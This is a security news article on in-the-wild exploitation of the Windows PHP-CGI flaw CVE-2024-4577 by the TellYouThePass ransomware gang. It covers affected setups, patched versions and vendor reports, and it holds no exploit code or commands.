PHP command injection flaw exploited to deliver ransomware (CVE-2024-4577)
An OS command injection vulnerability in Windows-based PHP (CVE-2024-4577) in CGI mode is being exploited by the TellYouThePass ransomware gang.
Imperva says the attacks started on June 8, two days after the PHP development team pushed out fixes, and one day after WatchTowr researchers published a technical analysis of the flaw and proof-of-concept exploit code.
About CVE-2024-4577
Discovered and reported by Orange Tsai, principal security researcher at Devcore, CVE-2024-4577 allows attackers to bypass the protections for an older PHP-CGI vulnerability (CVE-2012-1823) by using specific character sequences, and allows attackers to remotely execute code on targeted vulnerable systems.
The vulnerability affects all versions of PHP installed on the Windows operating system when running in CGI (common gateway interface) mode, which is a common enough scenario.
But “even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too,” the Devcore team noted.
The latter scenario is the default configuration for XAMPP (open-source PHP development environment) for Windows, so all versions of XAMPP installations on Windows are vulnerable by default, they added.
They urged users to ugrade their PHP to version 8.3.8, 8.2.20, or 8.1.29, or implement temporary mitigations.
The ransomware attack
On June 7, the Shadowserver Foundation warned about multiple IPs trying to exploit CVE-2024-4577 on internet-facing machines.
On Monday, Censys said there are about 458,800 exposed PHP instances that are potentially vulnerable, though they noted that the number of actually vulnerable ones is likely smaller.
On the same day, Imperva threat researchers shared that the TellYouThePass ransomware gang has been trying to leverage the vulnerability since June 8.
“The attackers used the known exploit for CVE-2024-3577 to execute arbitrary PHP code on the target system, leveraging the code to use the ‘system’ function to run an HTML application file hosted on an attacker-controlled web server via the mshta.exe binary. mshta.exe is a native Windows binary that can execute remote payloads, pointing to the attackers operating in a ‘living off the land’ style,” they explained.
The gang tries to install web shells and execute the ransomware.
UPDATE (June 13, 2024, 05:20 p.m. ET):
Greynoise has set up a tag to track in-the-wild attempts to exploit the vulnerability, and have revealed that attackers are trying to deliver a variety of malicious payloads, including a Gh0st RAT variant and Cobalt Strike beacons.